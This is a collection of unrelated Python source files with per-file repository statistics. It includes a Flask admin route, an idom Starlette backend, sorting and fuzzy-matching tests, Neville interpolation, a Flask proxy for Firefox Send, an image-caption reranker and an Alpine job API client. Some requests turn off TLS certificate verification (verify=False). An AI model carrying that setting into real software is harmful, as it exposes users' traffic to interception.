owner = service.owner_id # cache
if form.start.data is None and service.start is not None:
form.start.data = service.start
if form.end.data is None and service.end is not None:
form.end.data = service.end
service.__init__(**form.data)
service.owner_id = owner
validate_csrf(service.csrf_token)
service.save()
try:
if find_service(service.id):
return json.dumps({
'success': True
}), 200, {'ContentType':'application/json'}
except:
pass
return json.dumps({
'success': False
}), 400, {'ContentType':'application/json'}
elif _type == 'add':
form = ServiceForm(request.form)
service = Service(
**form.data
)
if current_user.rank().level < 1:
service.owner_id = current_user.id
validate_csrf(service.csrf_token)
try: service.category_items = dict(enumerate(service.category_items))
except: pass
service.save()
try:
if find_service(service.id):
return json.dumps({
'success': True,
'service_id': str(service.id)
}), 200, {"ContentType":"Application/Json"}
except:
pass
return json.dumps({
'success':False,
}), 400, {'ContentType':'application/json'}
elif _type == 'new':
if request.method == 'GET':
return render_template('admin/pages/services/_new.html', form=ServiceForm(), categories=sequalized_categories)
return redirect(url_for('service.services'))
elif _type == 'delete':
if id == 0:
return redirect(url_for('service.services'))
service = find_service(id)
if service:
service.delete()
return redirect(url_for('service.services'))
@module.route('/admin/services', methods=['GET'])
@login_required
def services():
page = request.args.get('page', 1, int)
if current_user.rank().level < 2:
services = paginate_service_owner_id(current_user.id, page=page, per_page=25)
else:
services = paginate(Service.query, page=page, per_page=25)
return render_template('admin/pages/services/services.html',
services=services, amount=amount) | 40.580153 | 135 | 0.569789 | 571 | 5,316 | 5.119089 | 0.204904 | 0.026343 | 0.028738 | 0.020527 | 0.461512 | 0.347246 | 0.281902 | 0.281902 | 0.281902 | 0.281902 | 0 | 0.00834 | 0.323363 | 5,316 | 131 | 136 | 40.580153 | 0.804281 | 0.000941 | 0 | 0.447368 | 0 | 0 | 0.091149 | 0.024105 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0.035088 | 0.087719 | 0 | 0.22807 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b78c81118416d931976b8f9e56f5af3adf5b603 | 5,799 | py | Python | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 55 | 2019-02-28T23:58:42.000Z | 2020-07-14T22:01:45.000Z | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 72 | 2019-04-04T18:46:30.000Z | 2020-06-24T02:47:57.000Z | src/idom/backend/starlette.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 7 | 2019-04-02T17:53:30.000Z | 2020-06-23T16:17:58.000Z | from __future__ import annotations
import asyncio
import json
import logging
from dataclasses import dataclass
from typing import Any, Awaitable, Callable, Dict, Tuple, Union
from starlette.applications import Starlette
from starlette.middleware.cors import CORSMiddleware
from starlette.staticfiles import StaticFiles
from starlette.types import Receive, Scope, Send
from starlette.websockets import WebSocket, WebSocketDisconnect
from idom.backend.types import Location
from idom.config import IDOM_WEB_MODULES_DIR
from idom.core.hooks import Context, create_context, use_context
from idom.core.layout import Layout, LayoutEvent
from idom.core.serve import (
RecvCoroutine,
SendCoroutine,
VdomJsonPatch,
serve_json_patch,
)
from idom.core.types import RootComponentConstructor
from ._asgi import serve_development_asgi
from .utils import CLIENT_BUILD_DIR, safe_client_build_dir_path
logger = logging.getLogger(__name__)
WebSocketContext: type[Context[WebSocket | None]] = create_context(
None, "WebSocketContext"
)
def configure(
app: Starlette,
constructor: RootComponentConstructor,
options: Options | None = None,
) -> None:
"""Return a :class:`StarletteServer` where each client has its own state.
Implements the :class:`~idom.server.proto.ServerFactory` protocol
Parameters:
app: An application instance
constructor: A component constructor
options: Options for configuring server behavior
"""
options = options or Options()
# this route should take priority so set up it up first
_setup_single_view_dispatcher_route(options, app, constructor)
_setup_common_routes(options, app)
def create_development_app() -> Starlette:
"""Return a :class:`Starlette` app instance in debug mode"""
return Starlette(debug=True)
async def serve_development_app(
app: Starlette,
host: str,
port: int,
started: asyncio.Event | None = None,
) -> None:
"""Run a development server for starlette"""
await serve_development_asgi(app, host, port, started)
def use_location() -> Location:
"""Get the current route as a string"""
scope = use_scope()
pathname = "/" + scope["path_params"].get("path", "")
search = scope["query_string"].decode()
return Location(pathname, "?" + search if search else "")
def use_scope() -> Scope:
"""Get the current ASGI scope dictionary"""
return use_websocket().scope
def use_websocket() -> WebSocket:
"""Get the current WebSocket object"""
websocket = use_context(WebSocketContext)
if websocket is None:
raise RuntimeError( # pragma: no cover
"No websocket. Are you running with a Starllette server?"
)
return websocket
@dataclass
class Options:
"""Optionsuration options for :class:`StarletteRenderServer`"""
cors: Union[bool, Dict[str, Any]] = False
"""Enable or configure Cross Origin Resource Sharing (CORS)
For more information see docs for ``starlette.middleware.cors.CORSMiddleware``
"""
serve_static_files: bool = True
"""Whether or not to serve static files (i.e. web modules)"""
url_prefix: str = ""
"""The URL prefix where IDOM resources will be served from"""
def _setup_common_routes(options: Options, app: Starlette) -> None:
cors_options = options.cors
if cors_options: # pragma: no cover
cors_params = (
cors_options if isinstance(cors_options, dict) else {"allow_origins": ["*"]}
)
app.add_middleware(CORSMiddleware, **cors_params)
# This really should be added to the APIRouter, but there's a bug in Starlette
# BUG: https://github.com/tiangolo/fastapi/issues/1469
url_prefix = options.url_prefix
if options.serve_static_files:
wm_dir = IDOM_WEB_MODULES_DIR.current
web_module_files = StaticFiles(directory=wm_dir, html=True, check_dir=False)
app.mount(url_prefix + "/_api/modules", web_module_files)
app.mount(url_prefix + "/{_:path}/_api/modules", web_module_files)
# register this last so it takes least priority
app.mount(url_prefix + "/", single_page_app_files())
def single_page_app_files() -> Callable[..., Awaitable[None]]:
static_files_app = StaticFiles(
directory=CLIENT_BUILD_DIR,
html=True,
check_dir=False,
)
async def spa_app(scope: Scope, receive: Receive, send: Send) -> None:
# Path safety is the responsibility of starlette.staticfiles.StaticFiles -
# using `safe_client_build_dir_path` is for convenience in this case.
path = safe_client_build_dir_path(scope["path"]).name
return await static_files_app({**scope, "path": path}, receive, send)
return spa_app
def _setup_single_view_dispatcher_route(
options: Options, app: Starlette, constructor: RootComponentConstructor
) -> None:
@app.websocket_route(options.url_prefix + "/_api/stream")
@app.websocket_route(options.url_prefix + "/{path:path}/_api/stream")
async def model_stream(socket: WebSocket) -> None:
await socket.accept()
send, recv = _make_send_recv_callbacks(socket)
try:
await serve_json_patch(
Layout(WebSocketContext(constructor(), value=socket)),
send,
recv,
)
except WebSocketDisconnect as error:
logger.info(f"WebSocket disconnect: {error.code}")
def _make_send_recv_callbacks(
socket: WebSocket,
) -> Tuple[SendCoroutine, RecvCoroutine]:
async def sock_send(value: VdomJsonPatch) -> None:
await socket.send_text(json.dumps(value))
async def sock_recv() -> LayoutEvent:
return LayoutEvent(**json.loads(await socket.receive_text()))
return sock_send, sock_recv
| 32.038674 | 88 | 0.703914 | 705 | 5,799 | 5.6 | 0.321986 | 0.020517 | 0.017731 | 0.013678 | 0.090172 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0.000863 | 0.201069 | 5,799 | 180 | 89 | 32.216667 | 0.851284 | 0.155372 | 0 | 0.044643 | 0 | 0 | 0.050465 | 0.010182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080357 | false | 0 | 0.169643 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b79cabe84902f79ff0d8c0db3006962e902cb92 | 650 | py | Python | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/tests/strings/test_lsd_string_sort.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | import unittest
from strings.lsd_string_sort import lsd_sort
class LSDSort(unittest.TestCase):
def setUp(self):
self.licenses = [
"4PGC938",
"2IYE230",
"3CI0720",
"1ICK750",
"1OHV845",
"4JZY524",
"1ICK750",
"3CI0720",
"1OHV845",
"1OHV845",
"2RLA629",
"2RLA629",
"3ATW723"
]
def test_strings_are_sorted(self):
sorted_data = lsd_sort(self.licenses)
manually_sorted_data = sorted(self.licenses)
self.assertEqual(sorted_data, manually_sorted_data) | 25 | 59 | 0.526154 | 57 | 650 | 5.77193 | 0.491228 | 0.121581 | 0.109422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132678 | 0.373846 | 650 | 26 | 59 | 25 | 0.675676 | 0 | 0 | 0.391304 | 0 | 0 | 0.139785 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b7fc793ffe2598f7fc3e99084535d7e8a02825e | 2,523 | py | Python | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | Neville.py | VdeThevenin/Lagrange-Neville | 35081615556d405dba30f874494e382ea5881817 | [
"CC0-1.0"
] | null | null | null | """
Lagrange's Interpolation class File
"""
import sympy as sp
import numpy as np
from time import process_time as timer
class Neville:
def __init__(self):
self.Q = []
self.time_ellapsed = 0
self.x = np.array([])
self.y = np.array([])
self._x = sp.symbols('x', real=True)
def clear_data(self):
self.Q = []
def start(self, data=[]):
if len(data) == 0:
raise ValueError("Dados Inválidos!!")
self.clear_data()
self.x = np.array(data[0].copy())
self.y = np.array(data[1].copy())
self.treat_data()
sp.init_printing()
x = self._x
qtd = self.x.size
for idx in range(qtd):
self.Q.append([0] * (qtd - idx))
self.Q = np.array(self.Q, dtype="object")
for idx in range(qtd):
self.Q[0][idx] = self.y[idx]
time0 = timer()
for degree in range(1, qtd):
for idx in range(len(self.Q[degree - 1]) - 1):
# Q[d][i] = ((x - self.x[idx])*self.Q[degree-1][idx+1] - (x - self.x[idx+degree])*self.Q[degree-1][idx])
# --------------------------------------------------------------------------------------------
# self.x[idx+degree] - self.x[idx]
self.Q[degree][idx] = (x - self.x[idx]) * self.Q[degree - 1][idx + 1]
self.Q[degree][idx] -= (x - self.x[idx + degree]) * self.Q[degree - 1][idx]
self.Q[degree][idx] /= self.x[idx + degree] - self.x[idx]
self.time_ellapsed = timer() - time0
def get_poli(self):
eq = sp.expand(self.Q[-1][-1])
print('Neville:\t' + str(eq))
for a in sp.preorder_traversal(eq):
if isinstance(a, sp.Float):
eq = eq.subs(a, round(a, 4))
return sp.lambdify(self._x, sp.expand(self.Q[-1][-1])), self.time_ellapsed, eq
def treat_data(self):
if self.x.size > 15:
step = self.x.size // int(5+self.x.size/10)
x = []
y = []
for i in range(self.x.size+step+1):
if i % step == 0:
if i >= self.x.size-1:
x.append(self.x[-1])
y.append(self.y[-1])
break
x.append(self.x[i])
y.append(self.y[i])
i += step
self.x = np.array(x)
self.y = np.array(y)
| 31.5375 | 120 | 0.442727 | 340 | 2,523 | 3.232353 | 0.226471 | 0.100091 | 0.080073 | 0.054595 | 0.247498 | 0.241128 | 0.213831 | 0.175614 | 0.153776 | 0.10737 | 0 | 0.019938 | 0.363853 | 2,523 | 79 | 121 | 31.936709 | 0.664798 | 0.122473 | 0 | 0.070175 | 0 | 0 | 0.015427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087719 | false | 0 | 0.052632 | 0 | 0.175439 | 0.035088 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b808a99380bd94afac98d7d0e9d8f814414f64f | 1,103 | py | Python | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | 1 | 2019-02-27T06:07:17.000Z | 2019-02-27T06:07:17.000Z | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | null | null | null | tests/test_fuzzy_matching.py | zhangkaizhao/supportbot | 03c8e1761a3450614b53c3bdc8c5c33af1f186ec | [
"MIT"
] | null | null | null | from supportbot.bots import FuzzyMatchingSupportbot
from helpers import get_fixture_filepath
def _make_bot(filename):
filepath = get_fixture_filepath(filename)
return FuzzyMatchingSupportbot(filepath)
def test_fuzzy_matching_reply():
filename = "questions_answers.txt"
question = "OK?"
bot = _make_bot(filename)
result = bot.reply(question)
assert(question in result["question"])
assert(result.get("answer") is not None)
def test_fuzzy_matching_reply_none():
filename = "questions_answers.txt"
question = "找不到"
bot = _make_bot(filename)
result = bot.reply(question)
assert(result is None)
def test_fuzzy_matching_reply_zh():
filename = "questions_answers_zh.txt"
question = "你好"
bot = _make_bot(filename)
result = bot.reply(question)
assert(question in result["question"])
assert(result.get("answer") is not None)
def test_fuzzy_matching_reply_zh_none():
filename = "questions_answers_zh.txt"
question = "讨厌啦"
bot = _make_bot(filename)
result = bot.reply(question)
assert(result is None)
| 21.627451 | 51 | 0.715322 | 137 | 1,103 | 5.49635 | 0.248175 | 0.111554 | 0.099602 | 0.106242 | 0.749004 | 0.622842 | 0.524568 | 0.486056 | 0.486056 | 0.486056 | 0 | 0 | 0.186763 | 1,103 | 50 | 52 | 22.06 | 0.839465 | 0 | 0 | 0.580645 | 0 | 0 | 0.116954 | 0.081596 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.16129 | false | 0 | 0.064516 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b808ed1b42ee2bf4fcd01d4c2489a179a5aa41b | 6,668 | py | Python | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | experiments/firefox_send/Flask_App.py | olegtaranenko/gw-proxy-serverless | afb5d7b7cfaf6bfb82bafe951e45c76a11a0ffd3 | [
"Apache-2.0"
] | null | null | null | import json
import sys
from websocket import create_connection
sys.path.append('.')
sys.path.append('./modules/OSBot-Utils')
from osbot_utils.utils.Files import Files
from flask import Flask,request,redirect,Response
#from flask_socketio import SocketIO, emit
import requests
from gw_proxy.api.Http_Proxy import Http_Proxy
from flask_sockets import Sockets
app = Flask(__name__)
sockets = Sockets(app)
#socketio = SocketIO(app)
SITE_NAME = 'https://glasswallsolutions.com/'
SITE_NAME = 'https://demo.pydio.com/'
#SITE_NAME = 'https://httpbin.org'
SITE_NAME = 'https://send.firefox.com/'
@app.route('/ping')
def ping():
return 'pong'
@sockets.route('/api/ws')
def echo_socket(ws): # this all works ok
print('\n\n********* /api/ws')
ff_ws = create_connection("wss://send.firefox.com/api/ws")
file_metadata = ws.receive()
print("sending file_metadata")
ff_ws.send(file_metadata)
target_details = ff_ws.recv()
print(f'target_details: {target_details}')
ws.send(target_details)
bytes_1 = ws.receive()
bytes_2 = ws.receive()
bytes_3 = ws.receive()
#print(f"sending bytes_1 : {len(bytes_1)}")
ff_ws.send(bytes_1)
#print(f"sending bytes_2 : {len(bytes_2)}")
ff_ws.send(bytes_2)
#print(f"sending bytes_3 : {len(bytes_3)}")
ff_ws.send(bytes_3)
result = ff_ws.recv()
print(f'result: {result}')
ws.send(result)
print('<<<< all done >>>>>\n\n')
@sockets.route('/api/ws__ok')
def echo_socket(ws):
print('********* in Socket')
message = ws.receive()
if type(message) is str:
print(f"received: {message}")
file_metadata = json.loads(message)
#print(f"fileMetadata: {message_data.get('fileMetadata')}")
print('>>>>> sending ok <<<<<<<<<<')
print(ws.send)
ws.send('{"url":"https://send.firefox.com/download/8de4acc1dd5bee5a/","ownerToken":"88b28511eb6d5fc2d23f","id":"8de4acc1dd5bee5a"}')
# , json=True, namespace='/api/ws')
print('>>>>> all done')
#print(Files.save_string_as_file('/tmp/_firefox_send__file_metadata', json.dumps(file_metadata)))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_1', ws.receive()))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_2', ws.receive()))
#print(Files.save_bytes_as_file('/tmp/_firefox_send__bytes_3', ws.receive()))
# while True:
# bytes = ws.receive()
# print(f'received {len(bytes)}')
# print(bytes)
# if len(bytes) == 1:
# break
#print(bytes)
#bytes_2 = ws.receive()
#bytes_3 = ws.receive()
##print(f'received {len(bytes_1)} - {len(bytes_2)} - {len(bytes_3)}')
# #print(type(ws.receive()),ws.closed)
# print('>>>>> 1')
# print(type(ws.receive()), ws.closed)
# print('>>>>> 2')
# print(type(ws.receive()), ws.closed)
# print('>>>>> 3')
ws.send('{"ok": true}', ws.closed)
print('>>>>> 4')
else:
print(f"received non string: {type(message)}")
#
#while not ws.closed:
# message = ws.receive()
# if not message:
# message = ''
# print(f'**** received file with size : {len(message)} ')
# ws.send({'ok-2': True}, json=True)
# ws.send({'ok': True}, json=True, namespace='/api/ws')
@app.route('/')
@app.route('/<path:path>',methods=['GET','POST',"PUT","DELETE"])
def proxy(path=''):
global SITE_NAME
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection','host']
try:
#print(request.headers)
target= f'{SITE_NAME}{path}'
if request.method=='GET':
response = Http_Proxy(target=target,method='GET',headers=request.headers).make_request()
return Response(response.get('body'), response.get('statusCode'),response.get('headers'))
elif request.method=='POST':
response = Http_Proxy(target=target, method='POST', headers=request.headers,body=request.data).make_request()
#print(response)
return Response(response.get('body'), response.get('statusCode'), response.get('headers'))
# headers = {}
# for (key,value) in request.headers:
# if key.lower() != 'host':
# headers[key] = value
# #print(headers)
# #print('content type: ', request.headers.get('Content-Type'))
# if request.headers.get('Content-Type')== 'application/json':
# print('POST : ', request.get_json())
# resp = requests.post(f'{SITE_NAME}{path}',json=request.get_json(), headers=headers)
# else:
# resp = requests.post(f'{SITE_NAME}{path}', data=request.get_data(), headers=headers)
# headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
# response = Response(resp.content, resp.status_code, headers)
# return response
elif request.method=='PUT':
headers = {}
for (key,value) in request.headers:
if key.lower() != 'host':
headers[key] = value
#print(headers)
#print('content type: ', request.headers.get('Content-Type'))
if request.headers.get('Content-Type')== 'application/json':
#print('PUT : ', request.get_json())
resp = requests.put(f'{SITE_NAME}{path}',json=request.get_json(), headers=headers)
else:
resp = requests.post(f'{SITE_NAME}{path}', data=request.get_data(), headers=headers)
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
return response
elif request.method=='DELETE':
resp = requests.delete(f'{SITE_NAME}{path}').content
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
return response
except Exception as error:
return f'{error}'
if __name__ == '__main__':
#app.run(debug = False,port=443, ssl_context='adhoc')
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
print('starting server')
server = pywsgi.WSGIServer(('', 12345), app, handler_class=WebSocketHandler)
server.serve_forever() | 38.543353 | 140 | 0.59913 | 810 | 6,668 | 4.782716 | 0.188889 | 0.034848 | 0.021683 | 0.020134 | 0.447599 | 0.413526 | 0.395457 | 0.355188 | 0.355188 | 0.355188 | 0 | 0.010965 | 0.234103 | 6,668 | 173 | 141 | 38.543353 | 0.747601 | 0.326035 | 0 | 0.131868 | 0 | 0.010989 | 0.182679 | 0.011277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043956 | false | 0 | 0.10989 | 0.010989 | 0.21978 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b83a834e3f1d50dc2140e7d4b70fe0b778dca6a | 4,513 | py | Python | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | image-comment-matching/rerank.py | stonyhu/Image-Commenting | eb925a3f99075d8b74c6cabd125f7b9a1f9786d2 | [
"Apache-2.0"
] | null | null | null | import time
import MeCab
from tqdm import tqdm
import argparse
import torch
import torch.nn.functional as F
from model import Model
from utils.functional import load_image_caption, str2bool
mecab = MeCab.Tagger('-Ochasen')
parser = argparse.ArgumentParser('Rerank all generated captions')
parser.add_argument('-d', '--image-dir')
parser.add_argument('-i', '--caption-file')
parser.add_argument('--cuda', type=str2bool, nargs='?',
const=True, default=torch.cuda.is_available(),
help='whether to use GPU acceleration.')
parser.add_argument('--model-file', type=str, default='output/best.pt')
parser.add_argument('-o', '--output-file', type=str, default='generation.rerank.txt')
parser.add_argument('-bs', '--batch-size', type=int, default=16)
parser.add_argument('--max-len', type=int, default=18)
args = parser.parse_args()
samples = load_image_caption(args.image_dir, args.caption_file, args.batch_size)
print(f'{time.asctime()}-Images and Captions loaded.')
matching_model, _ = Model.load(args, args.model_file)
print(f'{time.asctime()}-Matching Model loaded.')
def predict(samples):
result = {}
matching_model.model.eval()
for images, captions, image_paths in tqdm(samples, desc='Predicting'):
caption_vecs = matching_model.vectorize_text(captions, sample=False)
outputs = matching_model.model(images, caption_vecs)
outputs = F.softmax(outputs, dim=1).transpose(1, 0)[1]
outputs = outputs.data.cpu().numpy()
for image_path, caption, score in zip(image_paths, captions[0], outputs):
image_path = image_path.split('/')[-1]
if image_path not in result:
score_dict = dict()
score_dict[caption] = score
result[image_path] = score_dict
else:
result[image_path][caption] = score
sorted_result = {}
for image_path, score_dict in result.items():
ordered = sorted(score_dict.items(), key=lambda tup: tup[1], reverse=True)
sorted_result[image_path] = [(caption, '%.8f' % score) for caption, score in ordered]
return result, sorted_result
def rerank(pred_result):
gen_result = {}
for l in open(args.caption_file):
items = l.strip().split('\t')
image_path = items[0]
prob_dict = dict()
for i in range(1, len(items), 2):
caption = items[i]
prob = float(items[i + 1])
prob_dict[caption] = prob
gen_result[image_path] = prob_dict
for image_path, score_dict in pred_result.items():
for caption in score_dict.keys():
score_dict[caption] *= gen_result[image_path][caption]
sorted_result = dict()
for image_path, score_dict in pred_result.items():
ordered = sorted(score_dict.items(), key=lambda tup: tup[1], reverse=True)
sorted_result[image_path] = [(caption, '%.8f' % score) for caption, score in ordered]
return sorted_result
def filter_ner(result):
new_result = {}
for key in result.keys():
pairs = result[key]
new_pairs = []
for caption, score in pairs:
text = caption.replace(' ', '')
node = mecab.parseToNode(text)
flag = False
while node:
token = node.surface
features = node.feature.split(',')
tag = features[0]
tag_type = features[1]
if tag == '名詞' and tag_type == '固有名詞' and len(token) >= 2:
flag = True
break
node = node.next
if not flag:
new_pairs.append((caption, score))
new_result[key] = new_pairs
return new_result
def save2txt(result, filename):
with open(filename, 'w') as f:
for l in open(args.caption_file):
image_path = l.strip().split('\t')[0]
captions = result[image_path]
out_str = '\t'.join([y for x in captions for y in x])
f.write(f'{image_path}\t{out_str}\n')
if __name__ == '__main__':
pred_result, sorted_result = predict(samples)
# result1 = filter_ner(sorted_result)
save2txt(sorted_result, 'generation.matching.txt')
rerank_result = rerank(pred_result)
# result2 = filter_ner(rerank_result)
save2txt(rerank_result, 'generation.rerank.txt')
| 37.297521 | 94 | 0.605141 | 562 | 4,513 | 4.681495 | 0.272242 | 0.058153 | 0.04523 | 0.027366 | 0.154314 | 0.154314 | 0.145572 | 0.126568 | 0.126568 | 0.126568 | 0 | 0.008833 | 0.272546 | 4,513 | 120 | 95 | 37.608333 | 0.792568 | 0.015732 | 0 | 0.081633 | 0 | 0 | 0.089182 | 0.031967 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.081633 | 0 | 0.153061 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b83c5eaa2c2d8a8bb4f83de0e100de77825c6af | 16,924 | py | Python | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | null | null | null | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 8 | 2017-03-07T01:23:22.000Z | 2019-10-24T22:45:46.000Z | alpine/job.py | alpinedatalabs/python-alpine-api | 2f74e4eeb7cb6d2b4f2d73db90e8c4afc552d1e7 | [
"MIT"
] | 3 | 2017-03-13T11:15:19.000Z | 2019-03-24T21:47:05.000Z | import json
import pytz
from datetime import datetime, timedelta
try:
# For Python 3.0 and later
from urllib.parse import urlparse
from urllib.parse import urljoin
except ImportError:
# Fall back to Python 2.7
from urlparse import urlparse
from urlparse import urljoin
from .exception import *
from .alpineobject import AlpineObject
class Job(AlpineObject):
"""
A class for interacting with jobs. The top-level methods deal with jobs. The subclass `Task` can be used to interact with
individual tasks within a job.
"""
task = None
@property
def scheduleType(self):
return self.ScheduleType()
def __init__(self, base_url, session, token):
super(Job, self).__init__(base_url, session, token)
self.task = Job.Task(base_url, session, token)
def create(self, workspace_id, job_name, schedule_type=None, interval_value=0, next_run=None,
time_zone=None):
"""
Create a new job in a workspace with specified configuration.
:param int workspace_id: ID of the workspace where the job is to be created.
:param str job_name: Name of the job to be created.
:param str schedule_type: Job run interval time unit. Use the `Job.ScheduleType` object for convenience.
The default value is "on_demand".
:param int interval_value: Job run interval value. If you choose 'Job.ScheduleType.Weekly' for
`schedule_type` and '2' for `interval_value`, then it will run every 2 weeks.
:param datetime next_run: When the next run should happen.
:param timezone time_zone: Time zone info. If no time zone is provided, we use UTC.
:return: Created job metadata.
:rtype: dict
Example::
>>> session.job.create(workspace_id = 1672, job_name = "APICreatedJob",
>>> schedule_type = Job.ScheduleType.Weekly, interval_value = 2,
>>> next_run = datetime.today().now(pytz.timezone('US/Pacific')) + timedelta(hours=1),
>>> time_zone =pytz.timezone('US/Pacific')
>>> )
"""
if time_zone is None:
time_zone = pytz.utc
if schedule_type is None:
schedule_type = Job.ScheduleType.OnDemand
if next_run is None and schedule_type != Job.ScheduleType.OnDemand:
next_run = datetime.now(time_zone)
url = "{0}/workspaces/{1}/jobs".format(self.base_url, workspace_id)
url = self._add_token_to_url(url)
self.session.headers.update({"Content-Type": "application/x-www-form-urlencoded"})
# Building the payload information to send with our HTTP POST to create the job
payload = {"name": job_name,
"interval_unit": schedule_type,
"interval_value": interval_value,
"next_run": next_run,
"sucess_notify": "nobody",
"description": "",
"endrun": False,
"time_zone": time_zone
}
# Posting the payload via HTTP POST
self.logger.debug("POSTing payload {0} to URL {1}".format(payload, url))
response = self.session.post(url, data=payload, verify=False)
self.logger.debug("Received response code {0} with reason {1}...".format(response.status_code, response.reason))
try:
return response.json()['response']
except KeyError:
return response.json()
def delete(self, workspace_id, job_id):
"""
Delete a job from a workspace.
:param int workspace_id: ID of the workspace that contains the job.
:param str job_id: ID of the job to delete.
:return: None.
:rtype: NoneType
:exception JobNotFoundException: The job does not exist.
:exception InvalidResponseCodeException: The request got an unexpected HTTP status code in response (not 200 OK).
Example::
>>> session.job.delete(workspace_id = 1672, job_id = 675)
"""
try:
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
# POSTing a HTTP delete
self.logger.debug("Deleting the job ID: <{0}> from workspace ID: <{1}>".format(job_id, workspace_id))
response = self.session.delete(url, verify=False)
self.logger.debug("Received response code {0} with reason {1}".
format(response.status_code, response.reason)
)
if response.status_code == 200:
